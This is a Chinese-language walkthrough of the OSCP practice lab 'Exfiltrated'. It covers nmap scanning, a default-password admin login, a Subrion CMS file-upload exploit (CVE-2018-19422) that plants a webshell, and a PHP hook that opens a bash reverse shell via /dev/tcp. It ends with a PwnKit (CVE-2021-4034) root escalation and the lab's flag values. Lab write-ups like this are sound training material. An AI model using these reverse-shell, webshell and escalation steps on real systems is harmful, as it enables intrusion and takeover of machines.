OSCP靶场--Exfiltrated

OSCP靶场--Exfiltrated

考点(1.cms 站点地图插入php反弹shell 2. CVE-2021-4034提权 3.root定时任务提权[CVE-2021-22204])

1.nmap扫描

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 192.168.155.163 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-13 13:03 EDT
Nmap scan report for 192.168.155.163
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.55 seconds
                                                              

2.user priv

2.1 发现管理员面板[默认密码登陆]：cms版本 Subrion CMS v4.2.1

## google默认密码admin:admin登陆：
http://exfiltrated.offsec/panel/

##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit  Subrion CMS       
Subrion CMS 4.2.1 - Arbitrary File Upload                                                                 | php/webapps/49876.py

##                                                                                                                                          
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/49876.py    
  Exploit: Subrion CMS 4.2.1 - Arbitrary File Upload
      URL: https://www.exploit-db.com/exploits/49876
     Path: /usr/share/exploitdb/exploits/php/webapps/49876.py
    Codes: CVE-2018-19422
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (956)
Copied to: /root/Desktop/49876.py


### CVE-2018-19422  rce
┌──(root㉿kali)-[~/Desktop]
└─# python 49876.py -u http://exfiltrated.offsec/panel -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://exfiltrated.offsec/panel
[+] Success!
[+] Got CSRF token: mIUPOKjwTfQPSpbvwSNQoSfM7K7KeBVCDNxFFht0
[+] Trying to log in...

[x] Login failed... Check credentials
                                                                                                                                            
┌──(root㉿kali)-[~/Desktop]
└─# python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: RBz9SBrREPnzSJo5U5xTjm4B1W12UmYXf4yGHIp0
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: duglezaogvkkmhi

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/duglezaogvkkmhi.phar 

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

注意：

2.2 交互式shell【cms站点地图生成反弹shell】

┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80     

┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.216 LPORT=443 -f elf -o shel443.elf

##
$ curl -o /var/www/html/subrion/zcmd.php http://192.168.45.216/zcmd.php

##
$ curl -o /tmp/linpeas.sh http://192.168.45.216/linpeas.sh

$ ls -al /tmp
total 820
drwxrwxrwt  2 root     root       4096 Mar 13 17:47 .
drwxr-xr-x 20 root     root       4096 Jan  7  2021 ..
-rw-r--r--  1 www-data www-data 830030 Mar 13 17:47 linpeas.sh

$ chmod +x /tmp/linpeas.sh

$ ls -al /tmp
total 820
drwxrwxrwt  2 root     root       4096 Mar 13 17:47 .
drwxr-xr-x 20 root     root       4096 Jan  7  2021 ..
-rw-r--r--  1 www-data www-data 830030 Mar 13 17:47 linpeas.sh

使用反向webshell:

上面的所有方式都反弹shell失败：查看writeup:https://lipa.tech/posts/pg-exfiltrated/

发现另一种反弹方式：system------》Hooks------》sitemapGeneration------》插入下面代码------》sava------》nc在kali监听------》点击Generate Sitemap反弹shell

Site Map Generator------》插入php代码------》点击Generate Sitemap后反弹shell:

exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.45.178/80 0>&1'");

3. root priv

3.1 CVE-2021-4034提权：

## linpeas.sh枚举：
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    bash /opt/image-exif.sh

##
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                  
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main




### CVE-2021-4034提权
www-data@exfiltrated:/tmp$ wget http://192.168.45.178:8000/CVE-2021-4034.py
wget http://192.168.45.178:8000/CVE-2021-4034.py
--2024-03-14 03:04:52--  http://192.168.45.178:8000/CVE-2021-4034.py
Connecting to 192.168.45.178:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: 'CVE-2021-4034.py'

CVE-2021-4034.py    100%[===================>]   3.19K  --.-KB/s    in 0.001s  

2024-03-14 03:04:53 (4.64 MB/s) - 'CVE-2021-4034.py' saved [3262/3262]

www-data@exfiltrated:/tmp$ chmod +x ./CVE-2021-4034.py
chmod +x ./CVE-2021-4034.py
www-data@exfiltrated:/tmp$ python3 ./CVE-2021-4034.py
python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
# whoami
whoami
root
# uname -a
uname -a
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
# cat /root/proof.txt
cat /root/proof.txt
7c08fe47f1fdddee1970c01bc246be58
# ls /home/
ls /home/
coaran
# cat /home/coaran/local.txt
cat /home/coaran/local.txt
5e686fd428f8c1db63fa9cb98adcda52

3.2 CVE-2021-22204[exiftool]配合root定时任务提权【定时任务引入有漏洞的开源工具】

https://lipa.tech/posts/pg-exfiltrated/#escalation
##
https://al1z4deh.medium.com/proving-grounds-exfiltrated-cbf5a3209865
##
https://github.com/mr-tuhin/CVE-2021-22204-exiftool
https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b

4.总结：

## writeup:
https://lipa.tech/posts/pg-exfiltrated/
https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b